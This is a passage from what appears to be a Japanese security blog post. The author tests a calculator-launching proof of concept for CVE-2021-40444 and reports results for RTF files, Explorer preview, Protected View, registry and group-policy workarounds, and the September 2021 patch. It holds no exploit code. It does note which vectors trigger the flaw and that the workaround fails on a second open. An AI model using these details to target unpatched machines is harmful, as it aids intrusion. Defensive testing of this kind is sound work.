結果としては、docxと同様にRTFファイルを開くと電卓が起動、また@buffaloverflow氏のツイートにあるようにExplorer上のプレビューで開いた場合にも電卓が起動することを確認した。Explorer上のプレビューで起動する動画は次の通り

Windows Update後にどうなるかを調査した結果(2021/9/15追記)

2021年9月の月例アップデートでは、このCVE-2021-40444のパッチが適用される。

Windowsのゼロデイ脆弱性2件に対処 ~Microsoftが2021年9月のセキュリティ更新を発表 - 窓の杜

Security Update Guide - Microsoft Security Response Center

アップデートを適用した後にdocxとRTFを開いてみた(RTFはexplorerでのプレビューも)が、どちらも電卓が起動しないことを確認できた。

まとめ

  • CVE-2021-40444について、電卓を起動するPoCを検証した
  • 緩和策にある保護ビューで開いた場合には電卓が起動しないことを確認した
  • 回避策にあるグループポリシーおよびレジストリ設定の回避策を行った際は、初めて開いた際は電卓は起動しなかった
    • なお、二回開くと電卓が起動したが、この原因・理由については、知識不足故不明

(以下2021/9/15追記) * RTFが使われた場合、開くと電卓が起動する他、Explorer上のPreviewで見ても、電卓が起動することを確認した。 * 2021年9月の月例アップデート適用後にdocxおよびrtfを開いても電卓は起動しなかった。